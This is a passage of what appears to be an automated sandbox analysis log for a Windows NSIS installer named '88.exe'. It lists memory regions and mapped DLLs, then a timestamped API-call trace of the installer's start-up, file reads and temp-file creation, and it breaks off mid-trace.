"\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 4938 start_va = 0x1df0000 end_va = 0x1e2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001df0000" filename = "" Region: id = 4939 start_va = 0x2110000 end_va = 0x220ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002110000" filename = "" Region: id = 4940 start_va = 0x2210000 end_va = 0x2226fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000007.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000007.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000007.db") Region: id = 4941 start_va = 0x7efd5000 end_va = 0x7efd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 4942 start_va = 0x2230000 end_va = 0x2230fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002230000" filename = "" Region: id = 4962 start_va = 0x2240000 end_va = 0x2340fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 4963 start_va = 0x2240000 end_va = 0x2340fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 4964 start_va = 0x2240000 end_va = 0x2340fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 4965 start_va = 0x2240000 end_va = 0x2340fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 4966 start_va = 0x2240000 end_va = 0x2340fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 4967 start_va = 0x2240000 end_va = 0x2340fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 4968 start_va = 0x2240000 end_va = 0x2340fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 4969 start_va = 0x2240000 end_va = 0x2340fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 4970 start_va = 0x2240000 end_va = 0x2340fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 4971 start_va = 0x2240000 end_va = 0x2340fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 4972 start_va = 0x2240000 end_va = 0x2340fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 4973 start_va = 0x2240000 end_va = 0x2340fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 4976 start_va = 0x6bea0000 end_va = 0x6becdfff monitored = 0 entry_point = 0x6bea1bba region_type = mapped_file name = "shdocvw.dll" filename = "\\Windows\\SysWOW64\\shdocvw.dll" (normalized: "c:\\windows\\syswow64\\shdocvw.dll") Region: id = 4977 start_va = 0x6be20000 end_va = 0x6be95fff monitored = 0 entry_point = 0x6be216bb region_type = mapped_file name = "riched20.dll" filename = "\\Windows\\SysWOW64\\riched20.dll" (normalized: "c:\\windows\\syswow64\\riched20.dll") Region: id = 4978 start_va = 0x2240000 end_va = 0x233ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 4979 start_va = 0x1de0000 end_va = 0x1de4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\user32.dll.mui") Region: id = 4995 start_va = 0x2340000 end_va = 0x2c6ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 4996 start_va = 0x2240000 end_va = 0x22bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 4997 start_va = 0x2300000 end_va = 0x233ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002300000" filename = "" Region: id = 4998 start_va = 0x22c0000 end_va = 0x22fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000022c0000" filename = "" Region: id = 4999 start_va = 0x2c70000 end_va = 0x2d6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c70000" filename = "" Region: id = 5000 start_va = 0x7efad000 end_va = 0x7efaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efad000" filename = "" Region: id = 5139 start_va = 0x2d70000 end_va = 0x2d70fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002d70000" filename = "" Region: id = 5140 start_va = 0x2d70000 end_va = 0x2d70fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002d70000" filename = "" Region: id = 5220 start_va = 0x10000000 end_va = 0x10004fff monitored = 1 entry_point = 0x1000109f region_type = mapped_file name = "nsprocess.dll" filename = "\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsProcess.dll" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\nsaea97.tmp\\nsprocess.dll") Region: id = 5258 start_va = 0x2d70000 end_va = 0x2d71fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002d70000" filename = "" Region: id = 5259 start_va = 0x2d70000 end_va = 0x2d71fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002d70000" filename = "" Region: id = 5260 start_va = 0x2d70000 end_va = 0x2d74fff monitored = 1 entry_point = 0x2d71087 region_type = mapped_file name = "nsexec.dll" filename = "\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\nsaea97.tmp\\nsexec.dll") Region: id = 5717 start_va = 0x2d70000 end_va = 0x2d71fff monitored = 1 entry_point = 0x2d71087 region_type = mapped_file name = "nsexec.dll" filename = "\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\nsaea97.tmp\\nsexec.dll") Region: id = 5718 start_va = 0x2d70000 end_va = 0x2d71fff monitored = 1 entry_point = 0x2d71087 region_type = mapped_file name = "nsexec.dll" filename = "\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\nsaea97.tmp\\nsexec.dll") Region: id = 5719 start_va = 0x2d70000 end_va = 0x2d74fff monitored = 1 entry_point = 0x2d71087 region_type = mapped_file name = "nsexec.dll" filename = "\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\nsaea97.tmp\\nsexec.dll") Region: id = 5904 start_va = 0x2d70000 end_va = 0x2d71fff monitored = 1 entry_point = 0x2d71087 region_type = mapped_file name = "nsexec.dll" filename = "\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\nsaea97.tmp\\nsexec.dll") Region: id = 5905 start_va = 0x2d70000 end_va = 0x2d71fff monitored = 1 entry_point = 0x2d71087 region_type = mapped_file name = "nsexec.dll" filename = "\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\nsaea97.tmp\\nsexec.dll") Region: id = 5906 start_va = 0x2d70000 end_va = 0x2d74fff monitored = 1 entry_point = 0x2d71087 region_type = mapped_file name = "nsexec.dll" filename = "\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\nsaea97.tmp\\nsexec.dll") Region: id = 6073 start_va = 0x2d70000 end_va = 0x2d71fff monitored = 1 entry_point = 0x2d71087 region_type = mapped_file name = "nsexec.dll" filename = "\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\nsaea97.tmp\\nsexec.dll") Region: id = 6074 start_va = 0x2d70000 end_va = 0x2d71fff monitored = 1 entry_point = 0x2d71087 region_type = mapped_file name = "nsexec.dll" filename = "\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\nsaea97.tmp\\nsexec.dll") Region: id = 6075 start_va = 0x2d70000 end_va = 0x2d74fff monitored = 1 entry_point = 0x2d71087 region_type = mapped_file name = "nsexec.dll" filename = "\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\nsaea97.tmp\\nsexec.dll") Region: id = 6267 start_va = 0x2d70000 end_va = 0x2d71fff monitored = 1 entry_point = 0x2d71087 region_type = mapped_file name = "nsexec.dll" filename = "\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\nsaea97.tmp\\nsexec.dll") Region: id = 6268 start_va = 0x2d70000 end_va = 0x2d71fff monitored = 1 entry_point = 0x2d71087 region_type = mapped_file name = "nsexec.dll" filename = "\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\nsaea97.tmp\\nsexec.dll") Region: id = 6269 start_va = 0x2d70000 end_va = 0x2d74fff monitored = 1 entry_point = 0x2d71087 region_type = mapped_file name = "nsexec.dll" filename = "\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\nsaea97.tmp\\nsexec.dll") Thread: id = 201 os_tid = 0xccc [0254.402] SetErrorMode (uMode=0x8001) returned 0x0 [0254.412] GetVersion () returned 0x1db10106 [0254.412] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x769b0000 [0254.412] GetProcAddress (hModule=0x769b0000, lpProcName="SetDefaultDllDirectories") returned 0x76ff208a [0254.412] SetDefaultDllDirectories (DirectoryFlags=0xc00) returned 1 [0254.412] GetSystemDirectoryA (in: lpBuffer=0x18fcd0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0254.412] wsprintfA (in: param_1=0x18fce3, param_2="%s%s.dll" | out: param_1="\\UXTHEME.dll") returned 12 [0254.412] LoadLibraryExA (lpLibFileName="C:\\Windows\\system32\\UXTHEME.dll", hFile=0x0, dwFlags=0x8) returned 0x74430000 [0254.415] lstrlenA (lpString="UXTHEME") returned 7 [0254.415] GetSystemDirectoryA (in: lpBuffer=0x18fcd0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0254.415] wsprintfA (in: param_1=0x18fce3, param_2="%s%s.dll" | out: param_1="\\USERENV.dll") returned 12 [0254.415] LoadLibraryExA (lpLibFileName="C:\\Windows\\system32\\USERENV.dll", hFile=0x0, dwFlags=0x8) returned 0x6bf20000 [0254.791] lstrlenA (lpString="USERENV") returned 7 [0254.791] GetSystemDirectoryA (in: lpBuffer=0x18fcd0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0254.791] wsprintfA (in: param_1=0x18fce3, param_2="%s%s.dll" | out: param_1="\\SETUPAPI.dll") returned 13 [0254.791] LoadLibraryExA (lpLibFileName="C:\\Windows\\system32\\SETUPAPI.dll", hFile=0x0, dwFlags=0x8) returned 0x77030000 [0255.014] lstrlenA (lpString="SETUPAPI") returned 8 [0255.014] GetSystemDirectoryA (in: lpBuffer=0x18fcd0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0255.014] wsprintfA (in: param_1=0x18fce3, param_2="%s%s.dll" | out: param_1="\\APPHELP.dll") returned 12 [0255.014] LoadLibraryExA (lpLibFileName="C:\\Windows\\system32\\APPHELP.dll", hFile=0x0, dwFlags=0x8) returned 0x741f0000 [0255.521] lstrlenA (lpString="APPHELP") returned 7 [0255.521] GetSystemDirectoryA (in: lpBuffer=0x18fcd0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0255.521] wsprintfA (in: param_1=0x18fce3, param_2="%s%s.dll" | out: param_1="\\PROPSYS.dll") returned 12 [0255.521] LoadLibraryExA (lpLibFileName="C:\\Windows\\system32\\PROPSYS.dll", hFile=0x0, dwFlags=0x8) returned 0x740a0000 [0255.524] lstrlenA (lpString="PROPSYS") returned 7 [0255.524] GetSystemDirectoryA (in: lpBuffer=0x18fcd0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0255.524] wsprintfA (in: param_1=0x18fce3, param_2="%s%s.dll" | out: param_1="\\DWMAPI.dll") returned 11 [0255.524] LoadLibraryExA (lpLibFileName="C:\\Windows\\system32\\DWMAPI.dll", hFile=0x0, dwFlags=0x8) returned 0x743c0000 [0255.526] lstrlenA (lpString="DWMAPI") returned 6 [0255.527] GetSystemDirectoryA (in: lpBuffer=0x18fcd0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0255.527] wsprintfA (in: param_1=0x18fce3, param_2="%s%s.dll" | out: param_1="\\CRYPTBASE.dll") returned 14 [0255.527] LoadLibraryExA (lpLibFileName="C:\\Windows\\system32\\CRYPTBASE.dll", hFile=0x0, dwFlags=0x8) returned 0x75520000 [0255.528] lstrlenA (lpString="CRYPTBASE") returned 9 [0255.528] GetSystemDirectoryA (in: lpBuffer=0x18fcd0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0255.528] wsprintfA (in: param_1=0x18fce3, param_2="%s%s.dll" | out: param_1="\\OLEACC.dll") returned 11 [0255.528] LoadLibraryExA (lpLibFileName="C:\\Windows\\system32\\OLEACC.dll", hFile=0x0, dwFlags=0x8) returned 0x74790000 [0256.239] lstrlenA (lpString="OLEACC") returned 6 [0256.239] GetSystemDirectoryA (in: lpBuffer=0x18fcd0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0256.239] wsprintfA (in: param_1=0x18fce3, param_2="%s%s.dll" | out: param_1="\\CLBCATQ.dll") returned 12 [0256.239] LoadLibraryExA (lpLibFileName="C:\\Windows\\system32\\CLBCATQ.dll", hFile=0x0, dwFlags=0x8) returned 0x77320000 [0256.242] lstrlenA (lpString="CLBCATQ") returned 7 [0256.242] GetModuleHandleA (lpModuleName="VERSION") returned 0x0 [0256.242] GetSystemDirectoryA (in: lpBuffer=0x18fcbc, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0256.242] wsprintfA (in: param_1=0x18fccf, param_2="%s%s.dll" | out: param_1="\\VERSION.dll") returned 12 [0256.242] LoadLibraryExA (lpLibFileName="C:\\Windows\\system32\\VERSION.dll", hFile=0x0, dwFlags=0x8) returned 0x74520000 [0256.245] GetProcAddress (hModule=0x74520000, lpProcName="GetFileVersionInfoA") returned 0x74521ced [0256.245] GetModuleHandleA (lpModuleName="SHFOLDER") returned 0x0 [0256.245] GetSystemDirectoryA (in: lpBuffer=0x18fcbc, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0256.245] wsprintfA (in: param_1=0x18fccf, param_2="%s%s.dll" | out: param_1="\\SHFOLDER.dll") returned 13 [0256.245] LoadLibraryExA (lpLibFileName="C:\\Windows\\system32\\SHFOLDER.dll", hFile=0x0, dwFlags=0x8) returned 0x6bf10000 [0256.581] GetProcAddress (hModule=0x6bf10000, lpProcName="SHGetFolderPathA") returned 0x6bf11528 [0256.582] InitCommonControls () [0256.582] OleInitialize (pvReserved=0x0) returned 0x0 [0256.635] SHGetFileInfoA (in: pszPath="", dwFileAttributes=0x0, psfi=0x18fe2c, cbFileInfo=0x160, uFlags=0x0 | out: psfi=0x18fe2c) returned 0x1 [0258.643] lstrcpynA (in: lpString1=0x42ec00, lpString2="NSIS Error", iMaxLength=1024 | out: lpString1="NSIS Error") returned="NSIS Error" [0258.643] GetCommandLineA () returned="\"C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\88.exe\" " [0258.643] lstrcpynA (in: lpString1=0x435000, lpString2="\"C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\88.exe\" ", iMaxLength=1024 | out: lpString1="\"C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\88.exe\" ") returned="\"C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\88.exe\" " [0258.643] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0258.644] GetTempPathA (in: nBufferLength=0x400, lpBuffer=0x436400 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\") returned 0x25 [0258.651] lstrlenA (lpString="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp") returned 36 [0258.651] lstrcatA (in: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", lpString2="\\" | out: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\" [0258.651] CreateDirectoryA (lpPathName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp"), lpSecurityAttributes=0x0) returned 0 [0258.652] GetLastError () returned 0xb7 [0258.652] GetTickCount () returned 0x1d5e7a9 [0258.652] GetTempFileNameA (in: lpPathName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\", lpPrefixString="nsp", uUnique=0x0, lpTempFileName=0x436000 | out: lpTempFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nspE26B.tmp" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\nspe26b.tmp")) returned 0xe26b [0258.653] DeleteFileA (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nspE26B.tmp" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\nspe26b.tmp")) returned 1 [0258.654] GetTickCount () returned 0x1d5e7a9 [0258.654] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x436c00, nSize=0x400 | out: lpFilename="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\88.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\88.exe")) returned 0x2b [0258.654] GetFileAttributesA (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\88.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\88.exe")) returned 0x2020 [0258.654] CreateFileA (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\88.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\88.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2020, hTemplateFile=0x0) returned 0x1e0 [0258.654] lstrcpynA (in: lpString1=0x435c00, lpString2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\88.exe", iMaxLength=1024 | out: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\88.exe") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\88.exe" [0258.654] lstrlenA (lpString="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\88.exe") returned 43 [0258.655] lstrcpynA (in: lpString1=0x437000, lpString2="88.exe", iMaxLength=1024 | out: lpString1="88.exe") returned="88.exe" [0258.655] GetFileSize (in: hFile=0x1e0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1e7f04 [0258.655] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.656] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.656] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.656] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.656] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.656] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.656] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.656] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.656] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.656] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.657] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.657] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.657] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.657] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.657] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.657] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.657] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.657] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.657] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.657] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.657] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.657] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.657] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.657] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.657] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.657] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.657] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.657] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.657] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.658] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.658] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.658] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0258.658] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: 